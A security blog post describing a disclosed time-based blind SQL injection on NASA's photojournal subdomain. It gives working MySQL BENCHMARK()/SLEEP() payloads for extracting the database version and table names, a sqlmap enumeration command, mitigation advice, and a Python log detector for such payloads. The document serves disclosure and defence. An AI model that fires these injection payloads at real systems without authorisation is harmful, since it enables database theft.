Blind SQL Injection at photojournal.jpl.nasa.gov – A Deep Dive


A critical SQL Injection vulnerability was discovered at NASA's `photojournal.jpl.nasa.gov` subdomain and manually exploited using the MySQL `BENCHMARK()` function. The researcher confirmed the vulnerability with time-based techniques, inferring database information from how long the server took to respond.

Bugcrowd Disclosure:

https://bugcrowd.com/disclosures/e1e58b97-af59-49ae-acca-52bccab96e33/blind-sql-injection-at-photojournal-jpl-nasa-gov

You Should Know: Exploiting Blind SQL Injection with BENCHMARK()

1. Understanding the Payload

The researcher used a time-based payload to confirm the SQLi vulnerability:

-1+OR+IF(MID(version(),1,5)='5.7.2',BENCHMARK(900000,SHA1(1)),1)--+-

BENCHMARK(count, expr): Executes `expr` (here `SHA1(1)`) `count` times; with a large count this makes the query measurably slower without returning anything.
IF(cond, a, b): If the first five characters of `version()` equal `5.7.2`, the `BENCHMARK()` branch runs and the response is delayed; otherwise the query returns immediately. The response time therefore leaks one bit of information per request, which is what makes the injection "blind" but still exploitable.

2. Manual Exploitation Steps

1. Identify the vulnerable parameter (e.g., `?id=1`).

2. Test for Blind SQLi using a delay-based payload:
    ?id=1 AND IF(1=1,SLEEP(5),0)--

3. Extract the database version one character at a time:
    ?id=1 AND IF(MID(version(),1,1)='5',BENCHMARK(10000000,SHA1(1)),0)--

4. Dump table names, again one character per request:
    ?id=1 AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1,1),1,1)='a',BENCHMARK(5000000,SHA1(1)),0)--

3. Automating with SQLmap

For ethical testing, use:

sqlmap -u "http://example.com?id=1" --technique=T --dbms=mysql --batch --dbs

--technique=T: Time-based exploitation.
--dbs: Enumerate databases.

4. Mitigation (For Developers)

  • Use Prepared Statements (the `*` was lost in the original rendering):
    $stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
    $stmt->execute([$id]);

  • Input Validation: Whitelist allowed characters.
  • WAF Rules: Deploy ModSecurity or Cloudflare to block SQLi patterns.
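Besides blocking at the WAF, the payloads above are easy to spot in access logs, and a slow response to a request carrying a delay function is the signal that the injected delay actually executed. The following detector is an added example written for this post, not code from the researcher or from NASA; the log lines are constructed (Common Log Format plus a trailing response time in seconds) and the `/item?id=` path is assumed.

```python
"""Flag time-based blind SQLi attempts (BENCHMARK()/SLEEP()) in web access logs."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample: Common Log Format with the response time (seconds) appended.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /item?id=1 HTTP/1.1" 200 5120 0.08
203.0.113.5 - - [10/Mar/2024:12:00:05 +0000] "GET /item?id=1+AND+IF(1%3D1,SLEEP(5),0)-- HTTP/1.1" 200 5120 5.02
203.0.113.5 - - [10/Mar/2024:12:00:12 +0000] "GET /item?id=-1+OR+IF(MID(version(),1,5)%3D'5.7.2',BENCHMARK(900000,SHA1(1)),1)--+- HTTP/1.1" 200 5120 4.31
198.51.100.7 - - [10/Mar/2024:12:00:13 +0000] "GET /item?id=42&sort=benchmark HTTP/1.1" 200 910 0.05
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) (?P<secs>\d+(?:\.\d+)?)$'
)
# Require the opening parenthesis so an ordinary value like sort=benchmark is not flagged.
DELAY_FN_RE = re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.IGNORECASE)


def find_delay_payloads(target: str) -> list:
    """Return (param, decoded_value, function) for each query parameter with a delay call.
    parse_qsl decodes '+' and %XX once; decoding once more catches double-encoded payloads."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)
        m = DELAY_FN_RE.search(decoded)
        if m:
            hits.append((name, decoded, m.group(1).upper()))
    return hits


def scan_log(text: str, slow_seconds: float = 3.0) -> list:
    """One finding per request carrying a delay payload. Severity 'confirmed' means the
    response was also slow (the delay ran); 'attempt' means it was answered quickly
    (blocked, not vulnerable, or the count was too small to notice)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines not in the expected format
        hits = find_delay_payloads(m["target"])
        if not hits:
            continue
        secs = float(m["secs"])
        findings.append({"ip": m["ip"], "time": m["ts"], "param": hits[0][0],
                         "function": hits[0][2], "seconds": secs,
                         "severity": "confirmed" if secs >= slow_seconds else "attempt"})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Two findings from one source IP within seconds, both marked `confirmed`, are the pattern to alert on; a burst of `attempt` findings still shows probing even when the application is not vulnerable.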

What Undercode Says

Blind SQLi remains a severe threat, especially in legacy systems. The `BENCHMARK()` technique is powerful for time-based exploitation but requires patience. Always:
– Test with legal authorization.
– Use `sqlmap` for efficiency but understand manual techniques.
– Patch systems with parameterized queries.

Linux/Win Commands for Security Testing:

# Scan for open ports and service versions (Linux)
nmap -sV target.com

# Capture HTTP traffic to a pcap file (Linux)
tcpdump -i eth0 port 80 -w output.pcap

# List the 10 most recent failed logon events, Event ID 4625 (Windows, PowerShell)
Get-EventLog -LogName Security -InstanceId 4625 -Newest 10


Reported By: Miguelsegoviagil Bugbounty – Hackers Feeds